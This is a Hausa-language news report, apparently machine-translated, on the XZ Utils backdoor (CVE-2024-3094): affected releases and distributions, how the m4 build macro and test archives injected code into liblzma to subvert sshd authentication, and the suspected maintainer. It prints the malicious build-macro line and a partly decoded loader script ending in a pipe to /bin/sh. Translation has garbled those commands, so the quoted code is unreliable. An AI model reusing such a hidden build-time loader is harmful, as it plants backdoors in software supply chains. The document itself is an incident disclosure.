A cikin kunshin XZ Utils, wanda ya haɗa da ɗakin karatu na liblzma da kayan aiki don aiki tare da bayanan da aka matsa a cikin tsarin ".xz", an gano wani bayan gida (CVE-2024-3094) wanda ke ba da damar shiga tsakani da gyare-gyaren bayanan da aka sarrafa ta aikace-aikacen da ke da alaƙa. tare da ɗakin karatu na liblzma. Babban abin da ake nufi na bayan gida shine uwar garken OpenSSH, wanda a wasu rabe-raben ana haɗe shi da ɗakin karatu na libsystemd, wanda kuma yana amfani da liblzma. Haɗa sshd tare da ɗakin karatu mai rauni yana bawa maharan damar samun dama ga uwar garken SSH ba tare da tantancewa ba.
Ƙofar baya ta kasance a cikin sakin 5.6.0 da 5.6.1 na hukuma, wanda aka buga a Fabrairu 24 da Maris 9, wanda ya yi nasarar shiga cikin wasu rarrabawa da wuraren ajiya, misali, Gentoo, Arch Linux, Debian sid / unstable, Fedora Rawhide da kuma 40-beta, masana'anta na budeSUSE da tumbleweed, LibreELEC, Alpine gefen, Solus, NixOS m, OpenIndiana, OpenMandriva mirgina, pkgsrc na yanzu, Slackware na yanzu, gwajin Manjaro. Ana ba da shawarar duk masu amfani da sakin xz 5.6.0 da 5.6.1 da su mirgina cikin gaggawa zuwa sigar 5.4.6.
Daga cikin abubuwan da ke magance matsalar, ana iya lura da cewa sigar liblzma tare da kofa na baya bai sami damar zama wani ɓangare na tsayayyen sakin manyan rarrabawa ba, amma ya shafi openSUSE Tumbleweed da Fedora 40-beta. Arch Linux da Gentoo sun yi amfani da nau'in zx mai rauni, amma ba su iya fuskantar harin saboda ba sa amfani da facin systemd-sanarwa don buɗe ssh, wanda ke haifar da haɗin sshd zuwa liblzma. Ƙofar baya kawai tana shafar tsarin x86_64 bisa tushen Linux kernel da ɗakin karatu na Glibc C.
An ɓoye lambar kunnawa ta bayan gida a cikin m4 macros daga ginin-to-host.m4 fayil ɗin da kayan aikin kera ke amfani da shi lokacin gini. A lokacin taro, yayin aiwatar da ayyuka masu banƙyama masu banƙyama dangane da wuraren adana bayanai (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma), da aka yi amfani da shi don gwada daidaiton aiki, an samar da fayil ɗin abu tare da lambar ɓarna, wanda aka haɗa a ciki. ɗakin karatu na liblzma kuma ya canza tunanin aiki wasu ayyukansa. Macro na m4 waɗanda ke kunna ƙofar baya an haɗa su a cikin kwal ɗin sakin, amma ba su cikin ma'ajiyar Git. A lokaci guda, ma'auni na gwaji na mugunta sun kasance a cikin ma'ajiyar, watau. mutumin da ya aiwatar da bayan gida yana da damar yin amfani da ma'ajin ajiya da kuma hanyoyin samar da sakin.
Lokacin amfani da liblzma a cikin aikace-aikace, ana iya amfani da muggan canje-canje don tsangwama ko gyara bayanai, ko shafar aikin sshd. Musamman ma, lambar ƙeta ta lalata aikin RSA_public_decrypt don ƙetare tsarin tantancewar sshd. Ƙofar baya ta haɗa da kariya daga ganowa kuma ba ta bayyana kanta ba lokacin da aka saita masu canjin yanayi na LANG da TERM (watau lokacin gudanar da tsari a cikin tashar) kuma ba a saita masu canjin yanayi na LD_DEBUG da LD_PROFILE ba, kuma an kunna shi kawai lokacin aiwatar da /usr/sbin/sshd fayil mai aiwatarwa. Ƙofar bayan gida kuma tana da hanyar gano kisa a cikin wuraren da aka lalata.
Musamman, fayil ɗin m4/build-to-host.m4 da aka yi amfani da gl_am_configmake=`grep -aErls “#{4}[[:alnum:]]{5}#{4}$” $srcdir/ 2>/dev / null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
A cikin ginin farko, aikin grep ya sami gwajin fayil/files/bad-3-corrupt_lzma2.xz, wanda, lokacin da ba a shirya shi ba, ya haifar da rubutun: ####Hello#### #345U211267$^D330^W [! $(name) = "Linux"] && fita 0 [! $(name) = "Linux"] && fita 0 [! $(name) = "Linux"] && fita 0 [! $(name) = "Linux"] && fita 0 [! $(uname) = "Linux"] && fita 0 eval `grep ^srcdir= config.status` idan gwajin -f ../../config.status; sannan eval `grep ^srcdir= ../../config. .status` srcdir = "... null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (kai -c +2048>/dev/null) && kai -c +1024 && (kai - c +2048>/dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (kai -c +2048>/dev/null) && kai - c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (kai -c +2048>/ dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && ( shugaban -c +2048>/dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && shugaban -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024 && (shugaban -c +2048>/dev/null) && kai -c +1024)";(xz -dc) $srcdir/tests/files/good-large_compressed.lzma|eval $i| wutsiya -c +2048|tr "\1024-\939\31233-\114\321-\322\377-\35\47-\14 \34-\0""\13-\50")|xz -F raw —lzma113 -dc|/bin/sh ####Duniya####
Har yanzu ba a fayyace cikakken bayanin yadda maharan suka samu damar yin amfani da ababen more rayuwa na aikin xz ba. Har ila yau, ba a bayyana adadin masu amfani da ayyukan da aka lalata ba sakamakon bayan gida. Wanda ake zargi marubucin bayan gida (JiaT75 - Jia Tan), wanda ya buga rumbun adana bayanai tare da lambar mugunta a cikin ma'ajiyar, ya yi daidai da masu haɓaka Fedora kuma ya aika buƙatun ja zuwa Debian dangane da canjin rarraba zuwa reshen xz 5.6.0, kuma bai yi ba. tada zato, tun lokacin da ya shiga cikin xz yana tasowa shekaru biyu da suka gabata kuma shine mai haɓaka na biyu dangane da adadin canje-canjen da aka yi. Baya ga aikin xz, wanda ake zargin marubucin bayan gida ya kuma shiga cikin haɓakar xz-java da xz da aka saka. Bugu da ƙari, Jia Tan kwanakin da suka gabata an haɗa shi a cikin adadin masu kula da aikin XZ Embedded da aka yi amfani da shi a cikin Linux kernel.
An gano canjin ɓarnar bayan yin nazarin yawan amfani da CPU da kurakurai da valgrind ya haifar yayin haɗa ta ssh zuwa tsarin tushen Debian. Abin lura ne cewa xz 5.6.1 saki ya haɗa da canje-canjen da aka shirya wanda ake zargin marubucin gidan baya don amsa koke-koke game da raguwar sshd da faɗuwar da ya taso bayan haɓakawa zuwa sigar zx 5.6.0 tare da ƙofar baya. Bugu da ƙari, a bara Jia Tan ya yi canje-canje waɗanda ba su dace da yanayin duba "-fsanitize=address", wanda ya sa ya zama naƙasasshe yayin gwajin fuzz.
source: budenet.ru